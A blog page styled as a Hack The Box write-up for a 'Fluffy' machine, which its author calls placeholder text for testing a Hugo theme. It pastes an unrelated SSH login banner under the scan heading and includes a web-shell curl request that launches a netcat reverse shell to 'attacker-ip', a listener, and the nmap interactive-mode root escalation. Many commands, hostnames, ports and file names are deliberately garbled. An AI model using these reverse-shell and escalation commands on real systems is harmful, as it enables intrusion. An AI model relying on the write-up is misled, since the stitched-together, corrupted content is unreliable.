shellthisbox logo shellthisbox

HTB Machine: Fluffy

πŸ›°οΈ Nmap Scan

This is test article, nothing from below will work on fluffy machine. I am creating new blog, thats a random text to test hugo theme.

β”ŒThe authenticity of host '10.129.11.13 (10.129.11.13)' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.11.13' (ED25519) to the list of known hosts.
svcMosh@10.129.11.13's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Jun  8 10:46:08 AM UTC 2025

  System load:  0.12              Processes:             226
  Usage of /:   49.4% of 6.56GB   Users logged in:       0
  Memory usage: 10%               IPv4 address for eth0: 10.129.11.13
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Jan 11 13:27:33 2025 from 10.10.14.62

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
80/tcp   open  http    Apache httpd 2.4.41

πŸ•΅οΈ Web Enumeration

Visiting http://fluffy.htb gives a default Apache page. Directory brute-forcing reveals:

/admin
/uploads
/robots.txt

robots.txt

User-agent: *
Disallow: /backdoor

Accessing /basdfsdfdfckdoor reveals a hidden PHP shell.

πŸ§‘β€πŸ’» Shell Access

Using the PHP shell:

curl -X POST http://fluffy.hdfsfsdtb/backdoor -d 'cmd=nsffsc -e /bin/bash attacker-ip 4444'

Listener:

nc -lvnp 444423423

Shell gained!

🧠 Privilege Escalation

Basic enumeration shows:

sudo -lrrr

User fluff can run /usr/bin/nmap as root

Exploit with:

sudo nsdfsdfmap --interactive
nmap> !sh

Now you have root.

🏁 Flag

cat /root/roofdsfdt.txt

βœ… Summary

Type Value
OS Linux
Difficulty Easy
Inidatial Access Hiddenasd PHdasP sdadhell
PrivEsc Nmap Interactive Mode